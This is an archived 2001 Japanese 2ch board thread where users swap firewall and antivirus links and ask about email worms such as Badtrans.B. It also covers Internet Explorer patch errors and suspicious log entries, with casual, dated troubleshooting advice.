5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

○ネットセキュリティー板 質問、雑談スレッド[3]○

1 :1:01/11/27 20:17
勝手ながら新スレ立てました。
スレッドを立てるまでもない質問などはここで。
関連リンクの確認も忘れずにね

関連リンク>>2-10 >>11-20
予備リンク>>1-50

前スレ
http://pc.2ch.net/test/read.cgi/sec/999405173/l50

2 :1:01/11/27 20:18
ネットセキュリティー板 質問、雑談スレッド
http://ton.2ch.net/sec/kako/988/988707245.html
ネットセキュリティー板 質問、雑談スレッド[2]
http://pc.2ch.net/test/read.cgi/sec/999405173/l50

ファイアーウォールソフト 総合スレッド Part2
http://pc.2ch.net/test/read.cgi/sec/991646115/l50
■ 初心者用質問スレッド Part 4 ■
http://pc.2ch.net/test/read.cgi/sec/1006374515/l50
くだらねぇ質問はここに書き込め Ver212
http://pc.2ch.net/test/read.cgi/sec/1002134745/l50

3 :1:01/11/27 20:18
【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Sygate Personal Firewall http://www.sygate.com/
Tiny Personal Firewall http://www.tinysoftware.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/
【日本語パッチ 等】
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

ウィルス情報はこの辺で得られます。
http://www.ipa.go.jp/security/index.html
http://www.symantec.com/region/jp/
http://www.trendmicro.co.jp/
http://www.nai.com/japan/

4 :1:01/11/27 20:18
最強のファイアーウォールソフトって何かな?http://pc.2ch.net/test/read.cgi/sec/988724444/l50
ZoneAlarm Part3 http://pc.2ch.net/test/read.cgi/sec/1006399748/l50
Tiny Personal Firewall Part2 http://pc.2ch.net/test/read.cgi/sec/1006423282/l50
_■■BlackICEスレ■■_ http://pc.2ch.net/test/read.cgi/sec/992171869/l50
SygatePersonalFireWall http://pc.2ch.net/test/read.cgi/sec/993936202/l50

ノートン Internet Security2002ver2 http://pc.2ch.net/test/read.cgi/sec/1004019730/l50
ウイルスバスター2002 http://pc.2ch.net/test/read.cgi/sec/1002745629/l50
マカフィーってだめなの?http://pc.2ch.net/test/read.cgi/sec/994010282/l50

AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

[Windows板] 広告カットとファイヤーウォールソフ ト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板] 自分のパソコンへの不正侵入対策してますか?2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者@2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク@2ch掲示板 http://pc.2ch.net/hack/
windows@2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://pc.2ch.net/download/
パソコン一般@2ch掲示板 http://pc.2ch.net/pc/

5 :名無しさん@お腹いっぱい。:01/11/28 00:33
くだらない質問かもしれないですけどこれは何をされているんでしょうか?
Nov 27 14:04:45 ns named[12291]: lame server on 'ns2.cuhk.hk' (in 'hk'?): 128.103.1.1#53
Nov 27 14:28:18 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:28:18 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:28:21 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:28:21 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:17 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:17 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:19 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:19 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:55 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:55 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:29:57 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:29:57 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:07 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:07 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:09 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:09 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:49 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:49 ns named[12291]: lame server on 'www.seeyou.com' (in 'seeyou.com'?): 210.161.169.4#53
Nov 27 14:31:52 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.170.220#53
Nov 27 14:31:52 ns named[12291]: lame server on 'WWW.SEEYOU.COM' (in 'seeyou.com'?): 210.161.169.4#53

6 :名無しさん@お腹いっぱい。:01/11/28 01:06
質問です。
メールアドレスから調べて人のIE履歴を閲覧する事って可能なのでしょうか。
もし履歴を見ることが出来るのなら、HDの中も見られてしまうって事なのでしょうか。
よく噂を耳にしますので、とっても気になります。
どなたか教えてください。

7 ::01/11/28 01:43
現在、winmxにて【Carnivore】傍受systemのソース公開中
ユーザ @v@nzi57

8 :名無しさん@お腹いっぱい。:01/11/28 08:19
>>6
http://www.symantec.com/region/jp/securitycheck/index.html

9 :hotに:01/11/28 08:42
久々にログインしたら、こんなメールが入ってました。
開いても大丈夫なものでしょうか?

差出人            件名 日付 サイズ
wnmoney@rediris.es info request 11月 25日 1k
nasex@ox.ac.uk DO ME NOW FOR FREE!! 11月 24日 1k
oerg1myuo@arabia.com Spam: You Need A Second Income?? 11月 18日 4k
ddheidi@iol.it Do You Like Sex? 11月 10日 1k
jallison6585@arabia.... Spam: Do You Need A Second Income?? 11月 10日 4k

10 :くーね:01/11/28 13:09
メールを開いただけで、アドレス帳にあるメールアドレスに
スパムを送るウイスルが有ると聞きますが、
トレンドマイクロとかにあるオンラインウイルスチェックで
ウイルスを検知できますか?

あと、OE5を使ってるんですけど、メール送信ログを別に残すってことはできますか?
まさかウイルスも「送信済みアイテム」に残すとは思えないので・・

11 :名無しさん@お腹いっぱい。 :01/11/28 13:11
>8
ありがとうございます。
さっそく購入したいと思います。

12 :名無しさん@お腹いっぱい。:01/11/28 14:40
あなたのアドレス○○○○○○○・・に、
●●●●●●がシステムを繋げています。
即刻、インターフェイスを使用不可にしますと言う表示が出たのですが
、自分のシステム(ネット)の全体状態と、侵入をしてきた奴の
特定の仕方を教えてください。それと、もう侵入させないやり方も。

13 :名無しさん@お腹いっぱい。:01/11/28 19:11
これってどのウィルス?

http://news.2ch.net/test/read.cgi/news/1006764991/

14 :名無しさん@お腹いっぱい。:01/11/28 19:13
>>13
情報少なすぎ!

15 :名無しさん@お腹いっぱい。:01/11/28 19:32
>>13
Aliz/sircam/badtrans.a/badtrans.b
↑この4つのうちのどれか。

漏れはbadtrans.bに1票。

16 ::01/11/28 21:44
>>5
http://sdc.sun.co.jp/solaris2-faq/Q5.59.html
http://www.soi.wide.ad.jp/iw97/iw97_tut/slides/12_09/48.html
http://www.kozupon.com/log/log.html

17 :名無しさん@お腹いっぱい。:01/11/28 23:11
WinMXってセキュリティはどうなんですか?

18 :名無しさん@お腹いっぱい。:01/11/28 23:25
上にもあるけど大事なので 別枠で

「森の歩きかた」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/

19 :名無しさん@お腹いっぱい。:01/11/29 01:57
>>13
アリスでした。漏れ購読してたんで・・・(鬱
・・・ノートン先生ありがとう・・・

20 :名無しさん@お腹いっぱい。:01/11/29 10:32
Kyoto Shimbun 2001.11.28 News
--------------------------------------------------------------------------------

 市販ソフト不正入手 手助け容疑
 専門学校生ら逮捕
 ファイル交換ソフトをパソコンに取り込み、インターネットで市販ソフトを無断で入手できる状態にしたとして、
京都府警ハイテク犯罪対策室と山科署などは28日、著作権法(公衆送信権等)違反の疑いで、さいたま市指扇領別所、
専門学校生今西貴秋容疑者(20)と東京都の大学生(19)を逮捕した。
ファイル交換ソフトを使えば有料ソフトも簡単に手に入るため著作権侵害が国際問題にもなっているが、
利用者を摘発したのは全国で初めて、という。

 調べでは、2人は10月から11月の間、ファイル交換ソフト「WinMX」を自分のパソコンに設定し、
米国アドビ・システムズ社の画像編集ソフト「フォトショップ」(販売価格約9万6000円)を、
不特定多数の「WinMX」利用者に送信できるようにし、同社の著作権を侵害した疑い。

 府警によると、「WinMX」はインターネット上で無料で提供されており、
インターネットを通じて「WinMX」の利用者間で互いに所有ファイルを送受信できる。

 府警の調べでは、今西容疑者は音楽ソフトなど約560ファイル、
大学生もゲームソフトなど約2400ファイルを、送信できるようにしていたという。

 コンピュータソフトウェア著作権協会は「米国ではファイル交換ソフトをめぐって裁判になった。
日本でも約100万人がファイル交換ソフトを利用していると推定され、国際問題化している。
今後も警察などと協力し、目を光らせたい」としている。


21 :名無しさん@お腹いっぱい。:01/11/29 10:34
 2人は、音楽やわいせつ画像、ゲームなどもダウンロードできるようにしており、
府警は大量のソフトを扱っていたことやインターネットでいつでも利用できる状態にしていたことなどから悪質と判断した。

22 :名無しさん@お腹いっぱい。:01/11/29 14:06
プレビューしたら感染するメールってどうやって削除するの?
削除しようと選択(クリック)しただけでプレビューしやがる w
SP2入れてない人は、どうしたら安全に削除できるんだろ?
もちろん メーラーOE

23 :名無しさん@お腹いっぱい。:01/11/29 14:11
>>22
プレビュー切る。

24 :名無しさん@お腹いっぱい。:01/11/29 14:39
IE(インターネットエクスプローラ)は危ないと感じた人達へ

ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

25 ::01/11/29 15:21
メール消すよりOEを消す方が先と思われ。

26 :名無しさん@お腹いっぱい。:01/11/29 15:24
人様に迷惑をかけないよう
念のために接続も切ろう。

27 :名無しさん@お腹いっぱい。:01/11/29 15:27
とりあえず、表示→レイアウトでプレビュー欄のチェック外すべし。

28 :479:01/11/29 15:29
最強!!木馬殺し!98%で見付かるという謳い文句だ。確かに良かった。
http://www.moosoft.com/

29 :479:01/11/29 15:29
あ、スレッド間違えた。。。鬱だ。

30 :名無しさん@お腹いっぱい。:01/11/29 15:44
Nimdaスレでは、
どうしましょう→ネット切って首吊れ
てなのがよくあったもんだった。

31 :名無しさん@お腹いっぱい。:01/11/29 15:53
>30
ぶはは
2ちゃんねらーらしい(w

32 :名無しさん@お腹いっぱい。:01/11/29 16:09
ノートン先生ってどのソフト入れると出てくるの?
インターネットセキュリティ2002じゃ出ないのでしょうか?

33 :名無しさん@お腹いっぱい。:01/11/29 16:17
>>32
感染してからちょうど1週間後にモニターから出てくるよ。

34 :名無しさん@おなかいぱーい。:01/11/30 01:32

HTMLメール込みのHAMSTER.DOC.pifってファイル受け取ったやついる?

中身のぞいたらPIFじゃないんだこれが
漏れは逆アセンブラ持ってないのでわからんが
バイナリ見てたらレジストリいじくってるし
149.174.211.*なんていうIPが仕込んであるし
%KeyLogってあやしい変数もある

ウィルスチェッカーでは検知されず

35 :名無しさん@お腹いっぱい。:01/11/30 01:35
>>34
badtrans.B
惜しいね。。。
せめて1週間前なら大スクープ。。。バイナリ覗いた行為は称えたい。

36 :名無しさん@お腹いっぱい。:01/11/30 01:39
なんか微笑ましいね

37 :名無しさん@おなかいぱーい。:01/11/30 01:53
>>35
THX!

38 :奈々子さん@お腹へった。:01/11/30 01:58
>>34
私には、
CARD.DOC.pif
って添付ファイルが付いたメールが届きました。

39 :名無しさん@お腹いっぱい。:01/11/30 02:03
AAT00004.txtって添付ファイル付きのメールが昨日から来てるんです。
ウィルスなのか、トレンドマイクロで調べても出てこないし・・・。
題名は「Re:」でファイルサイズは40キロバイトもあるからアヤシイと
思うんですけど・・・・。
調べ方が悪いんですかね?

40 :名無しさん@お腹いっぱい。:01/11/30 03:21
40.4KBでW32.Badtrans@mm.encじゃないの?
ノートンだと処理されてtmpファイルになってます。
単品で来たりW32.Badtrans.B@mmと合わせて、昨日位から
来てます。

41 :名無しさん@お腹いっぱい。:01/11/30 03:32
W32.Badtrans@mm.enc
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=28116
BadtransBの亜種かな?
検疫のプロパティーで情報を見ると「発生率=まれ」おあるけど
昨日はBadtransB単品の1/3ぐらい混じってた。

ウイルスの発信元でメルアドが出る場合だと、女の名前がかなり
多い事に気付いた。

42 :名無しさん@お腹いっぱい。:01/11/30 05:16
fun.MP3.pif
Pics.DOC.scr
ってのが二日連続で送られてきました。
ノートンさんが検疫して隔離してくれたので大丈夫だと思うんですが
気分悪いし、新種らしいので心配です。

43 :名無しさん@お腹いっぱい。:01/11/30 13:42
この板の詳しい人はどうやって勉強したの?
独学?それとも専門学校とかいった人が多いの?

素朴なぎもーん。

44 :名無しさん@お腹いっぱい。:01/11/30 14:08
ウイルスとかあんま具体的に教えてくれる学校はないと思う。
個人、企業、学校その他組織とかで、苦労しながら
学んだ人が多いんでねえのかな?
最近だととにかく検索などやって、解説しているサイトさがしたり、
んでわからないことは掲示板とかで聞いたり、また他の人が
書いていることを読んだりすると、結構知識は身につくよ。

45 :名無しさん@お腹いっぱい。:01/11/30 15:04
>>4
ノートン Internet Securoty2002 Ver.3
http://pc.2ch.net/test/read.cgi/sec/1007009737/l50

46 :名無しさん@お腹いっぱい。:01/11/30 15:16
ここって おきにいりに登録してると
以外と便利ですね 他のスレッドに簡単に飛べるし

47 :名無しさん@お腹いっぱい。:01/12/01 14:25
うちのWin2000が増設したEドライブ(CD−RW)を突然認識しなくなりました。
原因は、昨日ダウンロードしたWin2000の修正プログラムか、
BADTRANS.Bの対策ツール→
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368
だと思うのですが、これってどういうことなのでしょう。

48 :名無しさん@お腹いっぱい。:01/12/01 14:30
>>43
ウィルスの学校なんてねぇだろ?

49 :名無しさん@お腹いっぱい。:01/12/01 14:31
>>39
昨日辺りも同じような人いたね。
漏れが見たときはまだ未解決だった。

50 :名無しさん@お腹いっぱい。:01/12/01 14:47
結局ウィルス対策ソフトはどれがいいの?

51 :名無しさん@お腹いっぱい。:01/12/01 14:48
あのー、次スレでは>>3にOutpostも入れてほしいのですが。

52 :名無しさん@お腹いっぱい。:01/12/01 14:50
>>51

53 :名無しさん@お腹いっぱい。:01/12/01 21:11
あのーwindows98使ってて、ブラウザにネスケ使ってるらしいんですが
(友人が)、この環境で感染するウィルスってあるんでしょうか?
メール閲覧はネスケでやってるらしいです。
感染したかも…(妙なメールがいっぱい来ているらしい)電話が来たんですが
私よく分からないので、宜しければお教え下さい。

54 :名無しさん@お腹いっぱい。:01/12/01 21:15
>>48
学校のマシンがウィルスだらけのところは
たくさんあるよw

55 :名無しさん@お腹いっぱい。:01/12/01 21:19
>>53

>この環境で感染するウィルスってあるんでしょうか?
・・・そりゃ幾らでも有ります。

>感染したかも… >>(妙なメールがいっぱい来ているらしい)
妙なメールをイパーイ送信したらしい、なら感染です。
「来てる」という事は感染者から送られまくってるって事でしょうか。
というか、メーラーはアウトルックですか?
ネスケ入れるときはちゃんとIEアンインストールしましたか?

56 ::01/12/01 21:20
>>53
まずスキャン汁。
http://www.trendmicro.co.jp/hcall/scan.htm

57 :48:01/12/01 21:21
>>54
笑えた。

58 :名無しさん@お腹いっぱい。:01/12/01 21:31
>>55
メーラーと言いますが、どうも無料のプロバイダのWebメールを
利用しているらしいです。メールは見ている、でも添付ファイルが
あったかどうか分からない…なんですよ。IEに関しては分からない、と。
(自分でセットしてないので分からないって。しっかしりてよ、ですよね)
で、ウィルスの目星だけでもつけたいのですが。なんかトロイの木馬は
来てたそうです(差出人が空欄のやつ)

>>56
こっちもスキャンを勧めたんですけど、上手く行かない(ブチブチきれる)らしくて。
マシン自体かなり前のなので、そのせいかもしれませんが。

59 :名無しさん@お腹いっぱい。:01/12/01 21:34
>>58
>メーラーと言いますが、どうも無料のプロバイダのWebメールを
>利用しているらしいです。

おまえ・・そんなこともわからんのか。

>しっかしりてよ、ですよね

日本語おかしいし。

60 :名無しさん@お腹いっぱい。:01/12/01 21:36
>>58
webメーラーならとりあえずは、
直接的な感染はしないと思います。
彼氏/彼女なら、アンチウイルスソフト、ちょっと早いけど、、、
クリスマスプレゼントに買って上げて下さい。
クリスマス当日は、、、、そ、そんな事言わせるなよ。。♥

61 :名無しさん@お腹いっぱい。:01/12/01 21:40
>>おまえ・・そんなこともわからんのか。

本人でなければ分からんでしょう
友人の話だって始めにかいてるじゃん

>>日本語おかしいし。


ただの打ち間違いじゃん…
あげあしとりしか出来ないんだね

62 :59:01/12/01 21:43
>>61
なんだ本人じゃないのか・・
どうりで"らしい"が多いと思った。

63 :名無しさん@お腹いっぱい。:01/12/01 21:51
>>60
たぶん大丈夫なんですね。本人は怖くてパソコンの電源入れられないって
言ってましたが、その旨、電話して見ます
ソフトは自分で買ってもらおうっと(私が欲しいくらいだ)

ありがとうございました >>55,>>56,>>60さま

64 :60:01/12/01 21:59
>>63
webメーラー「だけ」しか使って無いなら、、
という限定付きです。>>60レスは。
んで、クリスマスは、、、、♥
聞かないどいたげる(w

65 :名無しさん@お腹いっぱい。:01/12/01 22:12
>>1の文章ってコピペなんだね

しかも
1行づつ増えていってる 芸がこまかい

66 :名無しさん@おなかいぱーい。:01/12/01 23:12
34っす badtrans.Bの件ではドモ
ウィルスの構造勉強したいんすけど
いいディスアセンブラ知りませんか

新世紀VisualDisAssemblerってやつ
今は配布してないみたいなんで(つーか作者どこいった)

67 :名無しさん@お腹いっぱい。:01/12/02 00:03
IE5.01SP2のサポート終わっちゃったけど
もう5.5や6に乗り換えた?

68 :NAME OVER :01/12/02 00:36
ちょい前にウィルスにやられてからノートン入れ始めたんですが、
最近ヤケにNet Nusトロイの木馬デフォルトというアタック受けます。
これは意図的にやられているのでしょうか?
それとも相手が感染していて、無作為にアタックかけているのでしょうか?

69 :名無しさん@お腹いっぱい。:01/12/02 00:40
>>68
Net Nus??
し、新種だ!!!
アンチウイルス反応しないかも痴れないぞ。気おつけろ!!
無作為アタックも有るかも痴れん。。。。

70 :NAME OVER :01/12/02 00:47
すまん、NetBUSだ・・・鬱駄氏脳

71 :名無しさん@お腹いっぱい。:01/12/02 01:14
>>70
何だ、ナスぢゃ無かったのか。。がっかり。
これから検索して落そうかと思ったのに。。。
ちなみに、感染者がアタックする事は、まづ無い。
というか、踏み台にされてればそれも有りだけど。
むしろ、コントロールする(クライアント)プログラム
持ってる奴が、サーバプログラム仕込まれた(仕込んだ)
相手を探してる可能性の方が高い。厨房が殆ど。無視。
どうしても無視できない貴方は、ネットバス鯖エミュレート
して、接続してきたクライアント落すアプリも有るには有る。
でも、それ自体が偽装されてる鯖プログラムな奴も有るし。
本物でも多分玩具。逆に相手、あをるだけ。

72 :名無しさん@お腹いっぱい。:01/12/02 01:56
>>66
ttp://www.datarescue.com/idabase/ida.htm
eEyeはココのデスアセンブラ使ってコードレッドのデスアセ
とったらしい。。。GUIみたいね。
でも、シェア。正規版は299US$
フリーのデモ版も有る。回数制限と書き出し出来ない。コン
パイラの対応も限られてるみたい。うーん。デモで10Mだって。。。

ボランドC++suiteでターボデバッガ動かして見る漏れ。

73 :名無しさん@お腹いっぱい。:01/12/02 02:11
http://www.sophos.co.jp/
この会社って聞いたこと無いけど知ってる?

74 :NAME OVER :01/12/02 02:12
>71
ありがとうございます。これで安心して眠れます。

75 :名無しさん@お腹いっぱい。:01/12/02 02:14
>>73
アンチウイルスの会社。。。見りゃ解るか(w
パッケージのLINUX入れたら、コレ入ってた。

76 :名無しさん@お腹いっぱい。:01/12/02 02:20
>>67
サポートなんて元からあったのか?

IE6.0・・XP向け
IE5.5SP2・・ME向け
IE5.01SP2・・98向け

って聞いた。

77 :名無しさん@お腹いっぱい。:01/12/02 02:30
>>73
unix板ではおおむね好評の模様
>>75
検出具合とかどう?鯖サイドで管理できるから気になってるんだけど。

78 :_:01/12/02 03:34
>>73
Sophos は、イギリスなどヨーロッパでシェア一位。新種対応速度が速い。Linux, FreeBSD 向けは、個人利用なら無料。
Linux などから MS-Windows のパーティションをマウントできる環境だと、MS-Windows のウィルスも検知可能。

79 :78:01/12/02 03:38
追記:
IDE ファイルは、その都度更新。Version は、4ヶ月ぐらいで IDE の更新がなくなるため、3ヶ月おきぐらいでプログラム丸ごと再インストールが必須。
面倒だがその分、Sophos Anti-Virus 自体が書き変わっているので、Sophos Anti-Virus 自体がウィルスに冒される危険性が極めて少ない。

80 :73:01/12/02 04:03
ほー。
野豚、流行微、マカヒぐらいしか知らんかったよ。

81 :名無しさん@おなかいぱーい。:01/12/02 17:10
>>72
おぉ(・∀・)イイ! はげしくTHX!

>ボランドC++suiteでターボデバッガ動かして見る漏れ。

あ・・・それ会社にあったのに 大掃除で捨ててた
もらっときゃよかった

82 :名無しさん@おなかいぱーい。:01/12/02 17:35
34のディスアセンブラ補足っす
もっと調べて質問すればよかった 欝

dispe(和モノ)
ttp://www.mirai.ne.jp/~mitsuman/util/dispe/

Win32Program Disassembler(コーリアンモノ)
ttp://www.geocities.com/SiliconValley/Foothills/4078/

とか。

全員集合
ttp://dmoz.org/Computers/Programming/Disassemblers/

83 : :01/12/02 20:11
恐らくはウィルスの仕業だと思うのですが、WinMxをいじってたら
インターネットエクスプローラーが壊れてしまいました。
ネットに繋ぐこともできないので駆除ソフトもダウンロードできません。
このような場合どうすればよいのですか?
当方初心者で何もわかりません。

84 :名無しさん@お腹いっぱい。:01/12/02 20:35
>>83
市販のアンチウイルスソフトを購入してください。
ノートンアンチウイルスを薦めます。

ところで、↑はどこからどうやって書き込んでいるの?

85 :名無しさん@お腹いっぱい。:01/12/02 20:49
>>84
マン○喫茶・・・たぶん

86 :名無しさん@お腹いっぱい。:01/12/02 20:52
>>83
ウイルスチェックして不具合がウイルスが原因でないと判明した場合は
WinMXは二度を使わないことを誓い、PC初心者板へ。

87 :名無しさん@お腹いっぱい。:01/12/02 21:08
今すぐ

PCを

窓から

投げ捨てろ

88 :72:01/12/02 23:36
>>82
サーンクス。
とりあえず、漏れそんなに見つからんかった。
只で色々やって見る。

89 :83:01/12/03 01:41
>>84さん,>>86さん
ありがとうございます。友人のパソコンから書き込んでいます。
しかし、ウィルスだったらどうすれば良いのでしょうか?
本当に初歩の質問で申し訳ないのですが(この質問を最後に初心者板行きます)
あと、IEってどうすれば再インストールできるんですか?
ハードディスクなどにはそれほど影響が出ていないようなので、
無理矢理ネットに繋いで駆除ソフトをダウンロードできないかなー、
などと考えているのですが。

90 :名無しさん@お腹いっぱい。:01/12/03 02:02
今すぐ

PCから

窓を

投げ捨てろ

91 :名無しさん@お腹いっぱい。:01/12/03 06:16
>>83
ウイルスでシステムごと逝きそうなんじゃないの?
再インストールとか、そういう次元じゃ・・・。なってちゃって。(w

OSごと、再インストール・駆除ソフトインストール・MXは使わない。
これ、最強。

92 :名無しさん@お腹いっぱい。:01/12/03 12:35
BADTRANSとかNIMDAとかの名前って誰がつけるの?
既出ならすまそ。

93 :名無しさん@お腹いっぱい。:01/12/03 20:09
メディアプレイヤーのMS01-056の日本語パッチ出るの遅いなと思ってたら
昔からあるM$のセキュサイトにはもう出てるじゃねーか。
日本語化なんかすぐ出来るだろ、英語版と一緒に出せ。

94 ::01/12/03 21:06
>>92
最初に発見した人が命名するの。

95 :名無しさん@お腹いっぱい。:01/12/03 21:18
昨日どこかのスレに書いたはずなんだが見うし
なっちまたい。検索してもでてこねえ。。。

ファイアウォールで思ったんだけど、おみとろんの
COFIにある「Limit Access to Only...」ってやつ
不正アクセスブロックすんの?壁の役割すんの?

96 :名無しさん@お腹いっぱい。:01/12/03 21:57
質問です。
OS:Win98
ブラウザ:IE5.5にSP2,q240308,Q312461をあててあります。

http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-051
で情報が出ているセキュリティー情報についてですが、
リンク先の
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-051
でIE5.5 SP2用の対処プログラム(q306121.exe)をダウンロードしても、
「この修正プログラムをインストールするには Internet Explorer 5.5 Service Pack 2 が必要です。」
とメッセージが出てインストールできません。
既にSP2を入れてあるのに、何故こんなメッセージが出るのでしょうか?
(コントロールパネルからの「InternetExplorerの修復」は効果ありませんでした。)

97 :96:01/12/03 21:59
すみません、リンク先(後者のURL)は正しくは
http://www.microsoft.com/windows/ie/downloads/critical/q306121/default.asp
でした。

98 :名無しさん@お腹いっぱい。:01/12/03 22:17
>>96
>q240308,Q312461
それぞれIEのどのバージョンに対する修正で
何を修正したものか見直して見ましょう。

99 :96:01/12/03 22:34
>>98
すみません、意図することがよくわからないのですが…

とりあえず情報を集めてみましたが…
q240308

"Scriptlet.typelib"および"Eyedog" ---q240308
http://www.microsoft.com/japan/support/kb/articles/J051/6/55.asp
http://www.microsoft.com/windows/ie_intl/ja/security/eyedog.htm

Q312461

2001 年 11 月 13 日 Internet Explorer 用の累積的な修正プログラム (MS01-055)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-055

100 :名無しさん@お腹いっぱい。:01/12/03 22:42
>>99
Q240308はIEのどのバージョンに対する修正ですか?
Q312461に加えてQ306121の修正は必要ですか?

101 :96:01/12/03 22:51
>>100

q240308については、>>99の2番目のリンクでは
IE4.0と5について修正プログラムがありました。
5.5は5の枠内に入らないのですか?
(「5」だと「5.0」でなく5番台全体を指すのだと理解していました。
理由は>>99の一つ目のリンク先に
>この資料は、Internet Explorer 5 の、これまでに Web サイトでリリースされた
>バージョン (ベータ版を含む) とビルド番号について説明したものです。
と書いてあり、下のリストには5.5も載っているからです。)


q306121についての脆弱性

>ゾーン偽装の脆弱性 : CAN-2001-0664
>HTTP リクエスト エンコードの脆弱性 : CAN-2001-0665
>Telnet 実行の脆弱性の新種 : CAN-2001-0667

のうち、一番上はq312461で修正されてると思いますが、残りの2つは
されてないと思いますが…

102 :名無しさん@お腹いっぱい。:01/12/03 22:58
ウィルスバスター2002で最新ウィルスデータパターンファイルを更新
の項目がありますが、格納されるフォルダはご存知ありませんか?



103 :名無しさん@お腹いっぱい。:01/12/03 23:33
>>102
マルチ・ソフトの不正使用者ハケーン

104 :sage:01/12/03 23:34
>>92
すまん、知りたかったのは.Aとか.Bとかまで含めての話。
ここらしい。 http://www.wildlist.org/

105 :104:01/12/03 23:35
鬱...

106 :名無しさん@お腹いっぱい。:01/12/04 00:01
久しぶりにルーター内のマシンを立ち上げたら繋がらず、DHCPにしてあるIPを見るとなぜかグローバルのIPが入ってた。
IPドメインサーチで調べてみるとapnicとでてきた。
これって何かに感染してるんですか?
怖くて直接つないでDHCP試せない……

107 :質問です。:01/12/04 00:07
ノートン・インターネットセキュリティー2001体験版(30日)をインストールして
使っています。
しかし30日過ぎても使えるんですけどどうなっているのでしょうか?
正確には忘れましたが今日で31日目だと思うんですけど・・・

108 :名無しさん@お腹いっぱい。:01/12/04 00:13
>106
プロバイダは?YahooBB?

109 :160:01/12/04 00:20
>>108
CATVです。
件のDHCPですが、DHCPらしく再起動するたびに変わります。
LANケーブルはずしてるのに。

110 :名無しさん@お腹いっぱい。:01/12/04 00:24
>>109
ドメインサーチでapnicって出た場合、下のところに出る検索窓でapnicを
選択して再検索すればもう少し細かい情報がでるのでは?
apnicはただのnicだし…
APNIC=Asian Pacific Network Information Center

111 :106:01/12/04 00:31
>>110

IANA (NETBLK-LINKLOCAL)
Internet Assigned Numbers Authority
